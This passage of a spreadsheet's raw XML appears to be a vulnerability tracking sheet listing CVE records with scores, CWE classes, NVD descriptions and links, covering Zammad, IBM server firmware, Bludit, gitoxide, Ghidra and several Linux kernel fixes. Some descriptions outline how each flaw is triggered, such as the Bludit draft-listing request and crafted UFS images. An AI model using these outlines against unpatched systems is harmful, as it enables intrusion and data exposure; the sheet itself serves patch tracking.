          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when Zammad checks the digital signature on an incoming S/MIME-signed email, it does not verify that the signing certificate is genuinely trusted, it only checks whether a certificate with a matching name is already stored in the system. An attacker can create their own certificate using the name of a real, previously trusted sender and use it to send a forged email. Zammad will display that email with the same "validly signed" indicator as a genuine message from the real sender, even though the attacker never had access to that sender's actual certificate or private key. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84465</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93306</t>
        </is>
      </c>
      <c r="D207" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="inlineStr"/>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr"/>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr"/>
      <c r="M207" s="5" t="inlineStr"/>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>IBM Server Firmware FW1120.00 through FW1120.01, FW1110.00 through FW1110.31, FW1060.00 through FW1060.81, and FW950.00 through FW950.H3 is affected by a vulnerability in the ASMI web interface. An unauthenticated attacker on the management network can send a malformed HTTPS request to ASMI, causing the web server to crash with possible memory corruption and generate an error log. The ASMI web interface will restart automatically; however, repeated exploitation could result in a sustained loss of access to the ASMI management interface, resulting in an integrity and availability impact.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93306</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93365</t>
        </is>
      </c>
      <c r="D208" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="inlineStr"/>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr"/>
      <c r="M208" s="5" t="inlineStr"/>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>Bludit CMS through 3.22.0 contains a missing authorization vulnerability that allows authenticated users holding the Author or Editor role to read the full content of private drafts and scheduled posts belonging to any other user, including administrators, by exploiting the content-get-list AJAX endpoint in bl-kernel/ajax/content-get-list.php. Attackers can send an authenticated GET request to the admin AJAX endpoint with the draft parameter set to true, triggering getList() without ownership constraints and returning serialized page objects site-wide, exposing pre-publication material and sensitive notes stored in administrator-owned drafts.</t>
        </is>
      </c>
      <c r="T208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93365</t>
        </is>
      </c>
    </row>
    <row r="209">
      <c r="A209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B209" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100419</t>
        </is>
      </c>
      <c r="D209" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G209" s="5" t="inlineStr"/>
      <c r="H209" s="5" t="inlineStr"/>
      <c r="I209" s="5" t="inlineStr"/>
      <c r="J209" s="5" t="inlineStr"/>
      <c r="K209" s="5" t="inlineStr"/>
      <c r="L209" s="5" t="inlineStr"/>
      <c r="M209" s="5" t="inlineStr"/>
      <c r="N209" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O209" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P209" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q209" s="5" t="inlineStr"/>
      <c r="R209" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="S209" s="5" t="inlineStr">
        <is>
          <t>gitoxide gix-fs before 0.23.0 contains a path validation bypass vulnerability in the worktree checkout mechanism that allows attackers to escape the worktree directory via symlink manipulation. During forced checkout with overwrite_existing enabled, attackers can craft malicious repository trees where symlink entries replace validated directories, causing subsequent files to be written outside the worktree through the symlink for code execution or file manipulation.</t>
        </is>
      </c>
      <c r="T209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100419</t>
        </is>
      </c>
    </row>
    <row r="210">
      <c r="A210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B210" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100504</t>
        </is>
      </c>
      <c r="D210" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G210" s="5" t="inlineStr"/>
      <c r="H210" s="5" t="inlineStr"/>
      <c r="I210" s="5" t="inlineStr"/>
      <c r="J210" s="5" t="inlineStr"/>
      <c r="K210" s="5" t="inlineStr"/>
      <c r="L210" s="5" t="inlineStr"/>
      <c r="M210" s="5" t="inlineStr"/>
      <c r="N210" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O210" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P210" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q210" s="5" t="inlineStr"/>
      <c r="R210" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S210" s="5" t="inlineStr">
        <is>
          <t>Ghidra versions through 12.1.4 contain a stack-based out-of-bounds write vulnerability in the decompiler's leftshift128 function when processing negative shift amounts from p-code. Attackers can craft malicious binaries with specific instruction sequences that trigger the overflow when decompiled, corrupting memory and potentially achieving code execution.</t>
        </is>
      </c>
      <c r="T210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100504</t>
        </is>
      </c>
    </row>
    <row r="211">
      <c r="A211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B211" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97589</t>
        </is>
      </c>
      <c r="D211" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F211" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G211" s="5" t="inlineStr"/>
      <c r="H211" s="5" t="inlineStr"/>
      <c r="I211" s="5" t="inlineStr"/>
      <c r="J211" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K211" s="5" t="inlineStr"/>
      <c r="L211" s="5" t="inlineStr"/>
      <c r="M211" s="5" t="inlineStr"/>
      <c r="N211" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O211" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P211" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q211" s="5" t="inlineStr"/>
      <c r="R211" s="5" t="inlineStr"/>
      <c r="S211" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
s390/crypto: Fix wrong return code to engine in asynch callbacks
When crypto_finalize_hash_request() or
crypto_finalize_skcipher_request() explicitly completes a request, the
do_one_request callback must return 0 to indicate successful
handling. Returning a negative error code causes the crypto engine to
assume the driver failed to take ownership and triggers a second
completion via crypto_request_complete(), resulting in a double
completion. This pattern occurs in paes_s390.c 4 times and once in
phmac_s390.c.
Fixed in phmac_do_one_request() and all four paes do_one_request
callbacks (ecb, cbc, ctr, xts) by returning 0 after explicit
finalization instead of propagating the error code.</t>
        </is>
      </c>
      <c r="T211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97589</t>
        </is>
      </c>
    </row>
    <row r="212">
      <c r="A212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B212" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97608</t>
        </is>
      </c>
      <c r="D212" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F212" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G212" s="5" t="inlineStr"/>
      <c r="H212" s="5" t="inlineStr"/>
      <c r="I212" s="5" t="inlineStr"/>
      <c r="J212" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K212" s="5" t="inlineStr"/>
      <c r="L212" s="5" t="inlineStr"/>
      <c r="M212" s="5" t="inlineStr"/>
      <c r="N212" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O212" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P212" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q212" s="5" t="inlineStr"/>
      <c r="R212" s="5" t="inlineStr"/>
      <c r="S212" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: nf_log: unregister loggers before per-net teardown
nf_log_syslog and nfnetlink_log unregister their per-network namespace
operations before unregistering their global logger backends. This
leaves a window where a sysctl or netlink writer can rebind the still-
registered logger after the per-net pre-exit callback cleared the old
selection.
The race looks like this:
  CPU 0                                 CPU 1
  ----                                  ----
  unregister_pernet_subsys()
    nf_log_unset(net, logger)
      net-&gt;nf.nf_loggers[pf] = NULL
                                        lock nf_log_mutex
                                        find logger in loggers[][]
                                        net-&gt;nf.nf_loggers[pf] = logger
                                        unlock nf_log_mutex
  nf_log_unregister(logger)
    lock nf_log_mutex
    loggers[pf][type] = NULL
    unlock nf_log_mutex
    synchronize_rcu()
  module exit returns
  module core frees backend memory
Later, a sysctl read or packet logging operation can dereference the
stale per-net logger pointer.
Fix this by unregistering the global logger backends before tearing down
per-net state. Once the global registrations are gone, later writers can
no longer rebind the logger. unregister_pernet_subsys() already waits
for an RCU grace period after the pre-exit callback clears the per-net
selection, while nf_log_unregister() continues to cover readers of the
global logger table.
Apply this ordering fix to both nf_log backends that combine per-net
teardown with global logger registration.</t>
        </is>
      </c>
      <c r="T212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97608</t>
        </is>
      </c>
    </row>
    <row r="213">
      <c r="A213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B213" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97609</t>
        </is>
      </c>
      <c r="D213" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F213" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G213" s="5" t="inlineStr"/>
      <c r="H213" s="5" t="inlineStr"/>
      <c r="I213" s="5" t="inlineStr"/>
      <c r="J213" s="5" t="inlineStr"/>
      <c r="K213" s="5" t="inlineStr"/>
      <c r="L213" s="5" t="inlineStr"/>
      <c r="M213" s="5" t="inlineStr"/>
      <c r="N213" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O213" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P213" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q213" s="5" t="inlineStr"/>
      <c r="R213" s="5" t="inlineStr"/>
      <c r="S213" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
netfilter: cttimeout: prevent UAF during module unload
nf_ct_set_timeout() protects the timeout hook dereference and policy lookup
with rcu_read_lock(). cttimeout_exit(), however, unregisters the per-net
operations before it clears the hook.
This allows the following interleaving:
  CPU 0                              CPU 1
  cttimeout_exit()                   nf_ct_set_timeout()
    unregister_pernet_subsys()         rcu_read_lock()
      kfree(pernet)                     h = nf_ct_timeout_hook
                                        h-&gt;timeout_find_get()
                                          nfct_timeout_pernet()
The hook still points to ctnl_timeout_find_get() when CPU 1 looks up the
already freed per-net timeout list. KASAN reported:
  BUG: KASAN: slab-use-after-free in ctnl_timeout_find_get
  Read of size 8 by task poc/90
  Call Trace:
   ctnl_timeout_find_get+0x271/0x2a0 [nfnetlink_cttimeout]
   nf_ct_set_timeout+0x7b/0x3c0
   xt_ct_tg_check+0x724/0xb20
   xt_check_target+0x234/0xa90
   do_ipt_set_ctl+0x570/0x1270
  Allocated by task 89:
   __kmalloc_noprof+0x16e/0x460
   ops_init+0x6d/0x420
   register_pernet_operations+0x2f6/0x670
  Freed by task 91:
   kfree+0x131/0x390
   ops_undo_list+0x3d4/0x730
   unregister_pernet_operations+0x232/0x490
   unregister_pernet_subsys+0x1c/0x30
   cttimeout_exit+0x52/0x970 [nfnetlink_cttimeout]
Clear the hook and wait for existing readers before unregistering the
per-net operations. This blocks new policy lookups and ensures readers that
observed the hook finish before the per-net storage is freed.</t>
        </is>
      </c>
      <c r="T213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97609</t>
        </is>
      </c>
    </row>
    <row r="214">
      <c r="A214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B214" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97926</t>
        </is>
      </c>
      <c r="D214" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F214" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G214" s="5" t="inlineStr"/>
      <c r="H214" s="5" t="inlineStr"/>
      <c r="I214" s="5" t="inlineStr"/>
      <c r="J214" s="5" t="inlineStr"/>
      <c r="K214" s="5" t="inlineStr"/>
      <c r="L214" s="5" t="inlineStr"/>
      <c r="M214" s="5" t="inlineStr"/>
      <c r="N214" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O214" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P214" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q214" s="5" t="inlineStr"/>
      <c r="R214" s="5" t="inlineStr"/>
      <c r="S214" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ufs: validate cylinder group metadata before caching it
ufs_read_cylinder() copies the cylinder group index and the rotor
positions straight from the on-disk group and caches them without any
check:
	ucpi-&gt;c_cgx    = fs32_to_cpu(sb, ucg-&gt;cg_cgx);
	ucpi-&gt;c_rotor  = fs32_to_cpu(sb, ucg-&gt;cg_rotor);
	ucpi-&gt;c_frotor = fs32_to_cpu(sb, ucg-&gt;cg_frotor);
	ucpi-&gt;c_irotor = fs32_to_cpu(sb, ucg-&gt;cg_irotor);
They are then used as indices during allocation and free:
  - c_cgx indexes the cylinder summary array as
    UFS_SB(sb)-&gt;fs_cs(ucpi-&gt;c_cgx), so a value past s_ncg writes a 32
    bit count outside the s_csp allocation.
  - c_frotor becomes a bitmap scan start, start = c_frotor &gt;&gt; 3, and
    then length = ((s_fpg + 7) &gt;&gt; 3) - start. A start beyond the block
    bitmap wraps the unsigned length to a huge value, so ubh_scanc()
    walks far past the cylinder group buffers. c_irotor drives the
    inode bitmap the same way.
A crafted image can set any of these freely, turning an ordinary
allocation into an out of bounds access.
Reject a cylinder group whose recorded index does not match the group
being read, or whose rotors fall outside the group, before the metadata
is cached. Valid filesystems keep cg_cgx equal to the group number and
the rotors within the group, so only malformed images are rejected.</t>
        </is>
      </c>
      <c r="T214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97926</t>
        </is>
      </c>
    </row>
    <row r="215">
      <c r="A215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B215" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97931</t>
        </is>
      </c>
      <c r="D215" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F215" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G215" s="5" t="inlineStr"/>
      <c r="H215" s="5" t="inlineStr"/>
      <c r="I215" s="5" t="inlineStr"/>
      <c r="J215" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K215" s="5" t="inlineStr"/>
      <c r="L215" s="5" t="inlineStr"/>
      <c r="M215" s="5" t="inlineStr"/>
      <c r="N215" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O215" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P215" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q215" s="5" t="inlineStr"/>
      <c r="R215" s="5" t="inlineStr"/>
      <c r="S215" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ALSA: us122l: Prevent write upgrades for read mappings
The hwdep mmap callback rejects read-buffer mappings that are initially
writable, but leaves VM_MAYWRITE set on mappings created with PROT_READ.
A process that can open the hwdep node O_RDWR can later use mprotect() to
make the mapping writable.
The read allocation begins with struct usb_stream. Its read_size member is
used by the fault handler to decide which pages belong to the read buffer.
The read VMA intentionally remains expandable because pcm_usb_stream uses
mremap() after reading that size. Changing read_size first can therefore
map and access pages beyond the allocation. The same member is also
consumed by usb_stream_free(), where changing it can make
free_pages_exact() release pages outside the allocation.
Clear VM_MAYWRITE for read-buffer mappings after rejecting an initially
writable VMA. This keeps the separate output-buffer mapping writable while
preventing later permission upgrades.</t>
        </is>
      </c>
      <c r="T215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97931</t>
        </is>
      </c>
    </row>
    <row r="216">
      <c r="A216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B216" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97953</t>
        </is>
      </c>
      <c r="D216" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F216" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G216" s="5" t="inlineStr"/>
      <c r="H216" s="5" t="inlineStr"/>
      <c r="I216" s="5" t="inlineStr"/>
      <c r="J216" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K216" s="5" t="inlineStr"/>
      <c r="L216" s="5" t="inlineStr"/>
      <c r="M216" s="5" t="inlineStr"/>
      <c r="N216" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O216" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P216" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q216" s="5" t="inlineStr"/>
      <c r="R216" s="5" t="inlineStr"/>
      <c r="S216" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: stmmac: fix TX descriptor availability check for TSO traffic
stmmac_tso_xmit() estimates the number of free TX descriptors required by
a TSO skb as:
	(skb-&gt;len - proto_hdr_len) / TSO_MAX_BUFF_SIZE + 1
which assumes the payload is split into TSO_MAX_BUFF_SIZE chunks. This
underestimates the descriptors actually consumed by stmmac_tso_allocator(),
since each fragment is mapped individually and so it needs at least one
descriptor regardless of its size. Moreover, one descriptor is used for
the L2/L3/L4 headers and, when the MSS changes, one more is consumed for
the MSS context descriptor.
For a highly fragmented TSO skb the check can therefore pass even when the
ring has too few free slots. stmmac_tso_allocator() then writes past the
available descriptors, overwriting descriptors still owned by the DMA
engine, corrupting the TX ring.
Add stmmac_tso_get_num_desc() to compute the exact number of descriptors
needed for the header, the linear payload and each fragment, plus the MSS
context descriptor when required, and use it in the availability check.</t>
        </is>
      </c>
      <c r="T216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97953</t>
        </is>
      </c>
    </row>
    <row r="217">
      <c r="A217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B217" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98027</t>
        </is>
      </c>
      <c r="D217" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F217" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G217" s="5" t="inlineStr"/>
      <c r="H217" s="5" t="inlineStr"/>
      <c r="I217" s="5" t="inlineStr"/>
      <c r="J217" s="5" t="inlineStr"/>
      <c r="K217" s="5" t="inlineStr"/>
      <c r="L217" s="5" t="inlineStr"/>
      <c r="M217" s="5" t="inlineStr"/>
      <c r="N217" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O217" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P217" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q217" s="5" t="inlineStr"/>
      <c r="R217" s="5" t="inlineStr"/>
      <c r="S217" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: dsa: mv88e6xxx: bound the policy rule dump by the caller's buffer size
mv88e6xxx_get_rxnfc() uses rxnfc-&gt;rule_cnt as the write index while
dumping the policy IDR, clobbering the input value before it has been
looked at.  That input is the number of entries the caller had room for.
ETHTOOL_GRXCLSRLALL requires no CAP_NET_ADMIN and the ioctl sizes the
buffer from the rule_cnt userspace passes in, so once an admin has
installed policy rules any user can ask for fewer slots than there are
rules and run off the end of the allocation.  A rule_cnt of 0 leaves the
buffer pointer NULL and the walk dereferences it.
Count into a local so the caller's limit survives the walk, and stop with
-EMSGSIZE once it is reached.</t>
        </is>
      </c>
      <c r="T217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98027</t>
        </is>
      </c>
    </row>
    <row r="218">
      <c r="A218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B218" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98029</t>
        </is>
      </c>
      <c r="D218" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F218" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G218" s="5" t="inlineStr"/>
      <c r="H218" s="5" t="inlineStr"/>
      <c r="I218" s="5" t="inlineStr"/>
      <c r="J218" s="5" t="inlineStr"/>
      <c r="K218" s="5" t="inlineStr"/>
      <c r="L218" s="5" t="inlineStr"/>
      <c r="M218" s="5" t="inlineStr"/>
      <c r="N218" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O218" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P218" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q218" s="5" t="inlineStr"/>
      <c r="R218" s="5" t="inlineStr"/>
      <c r="S218" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
eth: nfp: bound the ntuple rule dump by the caller's buffer size
nfp_net_get_fs_loc() dumps every entry of nn-&gt;fs.list into rule_locs[]
without consulting cmd-&gt;rule_cnt, which is how many entries the caller
had room for.  ETHTOOL_GRXCLSRLALL requires no CAP_NET_ADMIN and the
ioctl sizes the buffer from the rule_cnt userspace passes in, so once an
admin has installed flow steering rules any user can ask for fewer slots
than there are rules and run off the end of the allocation.  A rule_cnt
of 0 leaves the buffer pointer NULL and the walk dereferences it.
Bail out with -EMSGSIZE when the buffer fills up, the way the other
ntuple capable drivers do, and report how many locations were filled so
a shrinking rule list does not leave the caller reading stale slots.</t>
        </is>
      </c>
      <c r="T218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-98029</t>
        </is>
      </c>
    </row>
    <row r="219">
      <c r="A219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B219" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-98030</t>
        </is>
      </c>
      <c r="D219" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F219" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G219" s="5" t="inlineStr"/>
      <c r="H219" s="5" t="inlineStr"/>
      <c r="I219" s="5" t="inlineStr"/>
      <c r="J219" s="5" t="inlineStr"/>
      <c r="K219" s="5" t="inlineStr"/>
      <c r="L219" s="5" t="inlineStr"/>
      <c r="M219" s="5" t="inlineStr"/>
      <c r="N219" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O219" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P219" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q219" s="5" t="inlineStr"/>
      <c r="R219" s="5" t="inlineStr"/>
      <c r="S219" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: dsa: bcm_sf2: bound the CFP rule dump by the caller's buffer size
bcm_sf2_cfp_rule_get_all() walks the whole cfp.unique bitmap into
